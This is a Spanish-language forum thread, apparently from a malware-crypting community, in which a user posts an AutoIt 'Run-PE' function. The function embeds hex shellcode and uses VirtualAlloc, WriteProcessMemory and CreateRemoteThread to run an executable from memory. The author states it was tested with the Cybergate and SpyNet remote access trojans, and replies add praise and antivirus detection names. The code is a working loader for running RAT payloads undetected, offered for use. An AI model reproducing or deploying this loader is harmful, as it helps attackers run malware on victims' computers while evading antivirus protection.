Buenas compadres ,

Hace tiempo no me conecto por cosas del trabajo que por estas datas me tomam todo el tiempo , pero no estoy muerto .... andare inactivo por más alguno tiempo , pero pronto volvere ....

Los dejo a disfrutar ....

Saludos


Código: Seleccionar todo

# ================================================
# Run-PE v2.0  [ Fasm ShellCode ]
# Run Exe Buffer From Memory ( Not Remote )
# Author : M3
# Thanks : DeadlyVermilion [ ShellCode ]
# Pirate-Inc (DZ)
# Pink
# Tested on XP SP3 | Win7 32 With Cybergate | SpyNet
# Usage : sRunFromMemory(SomeBinaryBuffer)
# Enjoy !!!
# ================================================



Func sRunFromMemory($sBinaryBuffer)

Local $sProcess , $sRemote_Tread , $sObject , $sMemoryStruct , $sStructPointer , $sStructShellCode , _
$sStructSize ,$sExeBuffer ,$sShellCodeBuffer,$sAsmBuffer ,$sLenExePath ,$sShellCode[19], $sShellBuffer  , _
$sAsmCode , $sAsmLen , $sExeAlocateBuffer , $sMemoryAsmStruct , $sAsmBufferDest , $sAsmMemoryData

Local Const $sKernel32 = "kernel32"

If Not $sBinaryBuffer <> "" Then

ConsoleWrite('Binary buffer not Exists , Choose an .exe File to Read First ...' )

Exit

EndIf

$sShellCode[1] = '0X8BEC81C4A4FAFFFF8945FCE81B0200008985CCFDFFFFBBF20F56C68B95CCFDFFFFE819020000894'
$sShellCode[2] = '5F8BBA98B802D8B95CCFDFFFFE8060200008945F4BB853BAEDB8B95CCFDFFFFE8F30100008945F0BB'
$sShellCode[3] = '9335DF858B95CCFDFFFFE8E00100008945ECBB8DCBB65D8B95CCFDFFFFE8CD0100008945E8BB5313C'
$sShellCode[4] = '1788B95CCFDFFFFE8BA0100008945E4BB8ADBDFA58B95CCFDFFFFE8A70100008945E0BB2E0550C88B'
$sShellCode[5] = '95CCFDFFFFE8940100008945DCBB85A116A28B95CCFDFFFFE881010000E8060000006E74646C6C005'
$sShellCode[6] = 'F57FFD08985D0FDFFFFBB8BE3CD418BD0E8600100008945D8BB39230D2C8B95D0FDFFFFE84D010000'
$sShellCode[7] = '8945D468000200008D85D4FDFFFF506A00FF55F86A448D8588FDFFFF50FF55D4FF55F48BC88D8578F'
$sShellCode[8] = 'DFFFF508D8588FDFFFF506A006A006A046A006A006A00518D85D4FDFFFF50FF55F068CC0200008D85'
$sShellCode[9] = 'A4FAFFFF50FF55D4C785A4FAFFFF020001008D85A4FAFFFF50FFB57CFDFFFFFF55EC64A1300000008'
$sShellCode[10] = 'B400C8B40148B401050FFB578FDFFFFFF55D88B7DFC037F3C6A406800300000FF7750FF7734FFB57'
$sShellCode[11] = '8FDFFFFFF55E8898574FDFFFF6A00FF7754FF75FCFFB574FDFFFFFFB578FDFFFFFF55E48D4718898'
$sShellCode[12] = '570FDFFFF0FB74714018570FDFFFF33C033F633C9EB296BC628038570FDFFFF8B9D74FDFFFF03580'
$sShellCode[13] = 'C8B55FC0350146A00FF70105253FFB578FDFFFFFF55E446663B770672D18B8574FDFFFF034728898'
$sShellCode[14] = '554FBFFFF8D85A4FAFFFF50FFB57CFDFFFFFF55E0FFB57CFDFFFFFF55DCC9C364A1300000008B400'
$sShellCode[15] = 'C8B400C8B008B008B4018C3558BEC83C4F4528955FC8B4A3C03CA894DF48B497803CA894DF88B511'
$sShellCode[16] = '88B4920034DFC33FF8B310375FC33C051AC8BC803F8D3C785C075F5593BFB741083C1044A75E0BAC'
$sShellCode[17] = '258621B5A33C0C9C38B45FC8B4DF88B59188B492403C82BDAD1E303CB0FB7198B4DF88B491C03C8C'
$sShellCode[18] = '1E30203CB03015AC9C300'


For $i = 1 to 18

	$sShellBuffer &= $sShellCode[$i]

Next


$sLenExePath = StringLen($sBinaryBuffer)

$sLenShellCode = StringLen($sShellBuffer) / 2

$sMemoryStruct = DllStructCreate ("Boolean BinaryBuffer[" & $sLenExePath & "];Boolean ShellCodeBuffer[" & $sLenShellCode - 1 & "];Boolean AsmCode[15]")

$sStructPointer = DllStructGetPtr ($sMemoryStruct , 1)

$sStructShellCode = DllStructGetPtr ($sMemoryStruct , 2)

$sStructSize = DllStructGetSize ($sMemoryStruct)

$sExeAlocateBuffer = DllCall($sKernel32, "ptr", "VirtualAlloc", "ptr", 0, "dword_ptr", $sStructSize, "dword", 4096, "dword", 64)

If IsArray($sExeAlocateBuffer) Then

$sExeBuffer = $sExeAlocateBuffer[0]

Else

ConsoleWrite ('Unable to Allocate Virtual Memory')

Exit

EndIf

$sShellCodeBuffer = $sExeBuffer + $sLenExePath

$sAsmCode   = "0X8D05"

For $i = 11 To 3 Step -2

$sAsmCode  &= StringMid ($sExeBuffer , $i , 2)

Next

$sAsmCode  &= "8D1D"

For $i = 11 To 3 Step -2

$sAsmCode  &= StringMid ($sShellCodeBuffer , $i , 2)

Next

$sAsmCode  &= "FFD3C3"

$sAsmLen = StringLen($sAsmCode) / 2 - 1

$sMemoryAsmStruct = DllStructCreate("Boolean AsmCopyMemory[" & $sAsmLen & "]")

DllStructSetData($sMemoryAsmStruct, 1, $sAsmCode)

$sAsmBufferDest = DllStructGetPtr($sMemoryStruct, 3)

$sAsmMemoryData = DllStructGetPtr($sMemoryAsmStruct , 1)

CopyMemory($sAsmBufferDest, $sAsmMemoryData , $sAsmLen)

DllStructSetData ($sMemoryStruct, 1 ,$sBinaryBuffer)

DllStructSetData ($sMemoryStruct, 2 ,$sShellBuffer)

$sProcess = DllCall($sKernel32, "int", "OpenProcess", "int", 0x001f0fff, "int", 0, "int", @AutoItPID)

If IsArray($sProcess) And Not @error Then

$sProcess = $sProcess[0]

DllCall($sKernel32, "int", "WriteProcessMemory", "int", $sProcess, "ptr", $sExeBuffer, "ptr", $sStructPointer, "int", $sStructSize, "int", 0)

$sAsmBuffer = $sShellCodeBuffer + $sLenShellCode - 1

Else

ConsoleWrite('Unable to Open Process')

Exit

Endif

$sRemote_Tread = DllCall($sKernel32, "int", "CreateRemoteThread", "int", $sProcess, "ptr", 0, "int", 0, "int", $sAsmBuffer, "ptr", 0, "int", 0, "int", 0)

if IsArray ($sRemote_Tread) And Not @error Then

$sRemote_Tread = $sRemote_Tread[0]

DllCall($sKernel32, "int", "WaitForSingleObject", "int", $sRemote_Tread, "int", 100)

DllCall($sKernel32, "int", "CloseHandle", "int", $sProcess)

DllCall($sKernel32, "bool", "VirtualFree", "ptr", $sExeBuffer, "dword_ptr", 0, "dword", 0X8000)

Else

ConsoleWrite ('Unable to Create Thread')

Exit

EndIf

EndFunc



Func CopyMemory($Des,$Source,$len)


local  $ASM = "0x8B7C24048B74240831C98B4C240CF3A4C300000000000000"

Local $BufferASM = DllStructCreate("byte[" & BinaryLen($ASM) & "]")


DllStructSetData($BufferASM, 1, $ASM)


Local $Ret = DllCall("user32.dll", "int", "CallWindowProcW", _
            "ptr", DllStructGetPtr($BufferASM), _
            "ptr", $des, _
            "ptr", $source, _
            "int", $len, _
            "int", 0)

EndFunc
Indetectables RAT v.0.9.5

@Indetectables Team
Buen trabajo, como siempre bro.

PD: Por cierto, igual no lo viste, ya hay categoría de AutoIt.

//Regards.
Ikarus: Backdoor.VBS.SafeLoader
Agnitum: Trojan.VBS.Safebot.A
http://indeseables.github.io/
Muchas gracias compadres , un saludo tios , nos vemos

PD : verdad Scorpio , no me di cuenta de la zona de AutoIt

Gracias compa
Indetectables RAT v.0.9.5

@Indetectables Team
Responder

Volver a “Fuentes”